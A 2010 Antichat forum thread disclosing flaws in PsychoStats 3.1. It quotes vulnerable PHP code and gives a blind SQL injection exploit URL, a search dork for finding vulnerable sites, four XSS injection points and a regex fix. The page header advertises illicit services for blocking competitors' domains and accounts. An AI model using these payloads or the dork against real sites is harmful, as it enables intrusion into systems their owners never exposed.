PsychoStats

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
PsychoStats

Опции темы

Поиск в этой теме

Опции просмотра

PsychoStats

03.01.2010, 18:06

oRb

Members of Antichat - Level 5

Регистрация: 09.05.2008

Сообщений: 304

С нами: 9477026

Репутация: 2362

PsychoStats

Продукт: PsychoStats 3.1 http://www.psychostats.com/
Уязвимость: Blind SQL-injection
Описание:
файл awards.php

PHP код:


		
			
if (empty($d) or !preg_match('/\d\d\d\d-\d\d?-\d\d?/', $d)) {

    $d = date('Y-m-d');

//    $d = $range[$v]['max'];

}

...

$cmd = "SELECT awarddate FROM $ps->t_awards WHERE awardrange = '$v' AND awarddate <= '$d' ";

if ($p) $cmd .= "AND topplrid=$_p ";

$cmd .= "ORDER BY awarddate DESC LIMIT 1";

list($d) = $ps->db->fetch_list($cmd);

Результат попадает вторым параметром в функцию date. Т.е. можно определять по дате в календаре результат выполнения sql запроса. (изврат)
Эксплойт:

Код:

/awards.php?d=2009-12-01'+and+0+union+select+1%23

Дорк: "Powered by PsychoStats" inurl:awards.php
Зависимости: magic_quotes_gpc = off
Решение: замена паттерна на следующий "/^\d\d\d\d-\d\d?-\d\d?$/"

XSS'ки:
/query.php?s=[XSS]
/ajax/flaglist.php?id='%3E[XSS] (работает только для зареганных)
/ajax/iconlist.php?id='%3E[XSS] (работает только для зареганных)
/admin/login.php?ref=%22%3E[XSS]

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
включи голову

03.01.2010, 22:07

rushter

Reservists Of Antichat - Level 6

Регистрация: 23.05.2008

Сообщений: 756

С нами: 9456866

Репутация: 979

Вроде в роа уже была тема с психостатом.

__________________
Blog

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Уязвимости статистики для онлайн игр ]	halkfild	Веб-уязвимости	11	13.01.2010 04:07

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход